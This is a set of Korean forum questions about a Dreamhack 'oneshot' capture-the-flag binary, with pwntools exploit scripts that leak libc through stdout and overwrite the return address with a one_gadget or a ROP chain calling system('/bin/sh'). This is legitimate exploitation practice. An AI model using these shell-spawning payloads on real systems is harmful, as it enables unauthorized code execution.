oneshot

안녕하세요 ㅎ

주어진 공유라이브러리를 통해 libc_base 주소도 구하고 one_gadget도 구했습니다. 화면 캡처 2022-04-30 135351.png 화면 캡처 2022-04-30 135247.png 페이로드를 one_gadget을 바꿔가며 위와같은 방식으로 작성했는데 풀리는게 없었습니다. 어디서 실수가 있었는지 궁금합니다.

공격은 성공했는데 의문점이 있습니다 buf = byte ptr -20h var_8 = qword ptr -8 lea rax, [rbp+buf] mov edx, 2Eh ; '.' ; nbytes mov rsi, rax ; buf mov edi, 0 ; fd call _read 이렇게 되면 마지막 ret가 2bytes 가 짤릴텐데 어떻게 공격이 성공되는지 궁금합니다

페이로드는 payload = "A"24 + p64(0)2 + p64(oneshot_gadget) 이렇게 작성했고 gdb로 attach 해서 리턴 주소에 값이 정확히 들어가는 것을 확인했는데 쉘이 실행되지 않았습니다 oneshot_gadget을 구하기 위해서 아래와 같이 식을 작성하였는데 libc_base = stdout - 0x3c5708 oneshot_gadget = libc_base + 0x45216 제가 생각하는 문제가 되는 부분은 libc_base를 구하는 부분입니다 처음에는 oneshot 파일을 그대로 gdb로 열고 print stdout을 해서 나온 주소에서, vmmap을 해서 나온 /usr/lib/x86_64-linux-gnu/libc-2.31.so의 base 주소(시작 주소)를 뺀 값인 0x1bf6a0를 stdout 값에서 빼줬으나 동작하지 않아 patchelf --replace-needed 명령어로 문제파일에서 주어진 so.6 파일로 변경 후 다시 gdb로 열었습니다 이렇게 하니까 vmmap 으로 봤을 때 변경된 so.6 파일이 열리는것을 확인했는데 문제는 제공된 libc.so.6 파일에 debug simbol이 없어 print stdout이 먹히지 않는다는 것이었습니다 https://typemiss.tistory.com/2 이 사이트를 참고해서 libc6-dbg 패키지를 다운받아 gdb 에서 set도 해보았고 readelf -s ./libc6.so.6 | grep stdout에서 나온 stdout의 오프셋 값도 사용해보았으나 여전히 해결되지 않았습니다 원리는 다 이해한거 같은데 몇 시간째 문제가 해결되지 않아 답답하네요.. 조언 부탁드립니다 (해결) 주어진 libc에서 필요한 데이터를 다 추출해서 풀었습니다 libc 바꿀 필요도 없고 로컬에서 되는거 확인해보지 않아도 되네요

제가 gdb를 이용하여 확인한 바로는 메모리 구성이 다음과 같았습니다. msg [0x10 byte] | ??? [0x8 byte] | check [8byte] | sfp [8byte] | ret [8byte] 그래서 익스플로잇 페이로드를 다음과 같이 구성했습니다. "A"0x10 + "A"0x8 + "\x00"0x8 + "A"0x8 + p64(oneshot_gadget) 근데 정상적인 실행이 이루어지지 않아서 방법을 찾다가 도저히 모르겠어서 질문 남깁니다 ㅠㅠ 뭐가 잘못된 건지 알 수 있을까요? 추가로, 가젯의 조건을 확인하고 조건에 부합하는 것을 이용했습니다. 또한 gdb를 이용해서 흐름을 확인할 때 "\x00"가 입력이 안되는 것처럼 보이더라구요. 혹시 이것이 문제라면 메모리에 0x0 값을 전달하는 방법이 있을까요?

로컬 환경 : Ubuntu 16.04 (가상머신) 로컬 환경에서 oneshot 바이너리를 대상으로 공격을 진행해보았는데 아래와 같이 에러를 출력해서 질문드립니다. 드림핵의 원격서버에서는 정상적으로 명령이 작동하는데 로컬 환경에서는 동작하지 않습니다.. 무언가 환경설정의 차이 때문인 것 같은데 어떠한 설정이 필요한지 모르겠습니다. [DEBUG] Sent 0x3 bytes: 'ls\n' [*] Process './oneshot' stopped with exit code -11 (SIGSEGV) (pid 11895) [*] Got EOF while sending in interactive `

dreamhack강의를 보면 gdb를 통해서 stdout 오프셋 값을 구해서 사용하는 것처럼 oneshot문제에서도 stdout 오프셋을 직접 gdb를 통해 찾아서 익스플로잇을 해봤지만 성공하지 못했습니다. 강의를 보면 라이브러리의 오프셋은 환경이나 라이브러리 마다 다르다고 나와있는데요. 그럼 제 환경에 맞는 오프셋도 실행이 되어야 하는게 아닌가 하는 의문점이 듭니다. 또, 다른 질문자님에 답변을 보며 objdump -D libc.so.6 ~ 을 이용해서 오프셋을 구해서 익스플로잇을 하면 성공하는 것도 확인했는데 다른 점이 뭔지, gdb에서 구한 값은 왜 익스플로잇에 실패하는지 궁금합니다.

안녕하세요 제가 pwnable 'oneshot' 문제를 풀다 도저히 모르겠어서 질문을 올립니다. 아래 코드에서 아무리봐도 페이로드는 맞게 짠거 같은데 쉘이 실행 안되서 오프셋에서 문제가 생긴것으로 추측되어 질문을 드립니다. 뭐가 문제인건가요? from pwn import * #p = remote("host1.dreamhack.games", 21088) p = process('./oneshot') e = ELF("./oneshot") libc = ELF("./libc.so.6") stdout_offset = libc.symbols["IO_2_1_stdout"] one_gadget_offset = 0x045216 p.recvuntil("stdout: ") stdout_address = int(p.recvuntil('\n')[:-1], 16) libc_base = stdout_address - stdout_offset one_gadget_address = libc_base + one_gadget_offset payload = b'A'0x18 + p64(0) + b'B'0x8 + p64(one_gadget_address) p.sendafter("MSG: ", payload) p.interactive()

one_gadget안쓰고 ROPgadget로 인자 직접 넣어볼려고 하는데 스택에 값이 제대로 안들어갑니다 from pwn import * p = process('./oneshot') e = ELF('./oneshot') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') stdout_offset = libc.symbols['IO_2_1_stdout'] system_offset = libc.symbols['system'] read_plt = p64(e.plt['read']) read_got = p64(e.got['read']) p.recvuntil('stdout: ') stdout = int(p.recv(14), 16) lb = stdout - stdout_offset system = lb + system_offset pop_rdi = p64(lb + 0x2164f) pop_rsi = p64(lb + 0x23a6a) payload = b'A'24 + b'\x00'8 + b'A'*8 payload += pop_rdi + p64(0) payload += pop_rsi + read_got payload += pop_rdi + p64(system+0x8) payload += read_plt p.sendafter('MSG: ', payload) p.send(p64(system)+b'/bin/sh\x00') p.interactive() 0x7ffe0b118d10: 0x4141414141414141 0x4141414141414141 0x7ffe0b118d20: 0x4141414141414141 0x0000000000000000 0x7ffe0b118d30: 0x4141414141414141 0x00007fcfc077d64f # <- pop_rdi 0x7ffe0b118d40: 0x0000000000000001 0x00007ffe0b118e18 0x7ffe0b118d50: 0x0000000100008000 0x0000560936a2ca41 0x7ffe0b118d60: 0x0000000000000000 0xbc288625463e94b4 pop rdi; ret까지는 제대로 들어갔는데 그이후로부터 이상하게 들어가네요 가젯은 제대로 찾은거 확인했습니다

stdout_offset = libc.symbols["IO_2_1_stdout"] 를 통해 libc에 있는 stdout 주소를 확인할 수 있었습니다. wsl환경에서 실제로 주소를 확인해보고 싶어서 파이썬 익스플로잇코드가 아닌 wsl환경에서 readelf를 통해 찾아보려고 하였습니다. readelf -s libc.so.6 | grep 'stdout' -> 는 stdout이 코드 실행 내부에서 실제로 stdout을 가리키는 포인터 주소임으로 이해했는데 맞는지 궁금합니다. gdb 내에서 print stdout 을 통해 (FILE *) 0x7ffff7fa65c0 <IO_2_1_stdout> 를 확인하였고 IO_2_1_stdout 임을 확인했는데 이 것을 wsl 내부 경로에서 readelf -s libc.so.6 | grep 'IO_2_1_stdout' 로 했을 때 뜨는게 아무것도 없습니다. 이유가 뭔지 궁금합니다.